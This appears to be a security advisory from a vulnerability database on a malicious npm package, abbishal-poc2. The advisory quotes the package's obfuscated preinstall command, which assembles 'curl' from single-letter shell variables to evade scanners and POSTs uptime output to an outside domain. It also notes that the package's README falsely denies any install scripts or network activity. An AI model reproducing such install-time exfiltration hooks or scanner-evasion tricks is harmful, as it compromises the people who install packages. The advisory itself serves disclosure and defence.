VDB

GCVE-110-OSM-2026-13419

GCVE-110-OSM-2026-13419
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published October 8, 2026
package.json declares a preinstall script `sh./test.sh`. test.sh assembles the string `curl` from single-character shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and then invokes `$i$h$l -d "`uptime`" https://abbishal.com/sh/poc`, POSTing the output of `uptime` (and implicitly the installer's source IP) to abbishal.com at npm install time. The README claims the package has no install scripts and no network activity, directly contradicting the shipped behavior. The command-name obfuscation via per-letter variable assembly is a technique to evade static scanners searching for `curl` in lifecycle scripts, and the destination domain does not match the package's claimed publisher. ENTRY colours.scss (main: colours.scss) - Preinstall Script in package.json: ""preinstall": "sh ./test.sh"" ADDITIONAL FINDINGS - Publisher Has Other Malicious Packages

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownabbishal-poc2all (affected)—

References

advisory
vendor

Browse GCVE Records

3,328 records in the GCVE database · Updated October 10, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›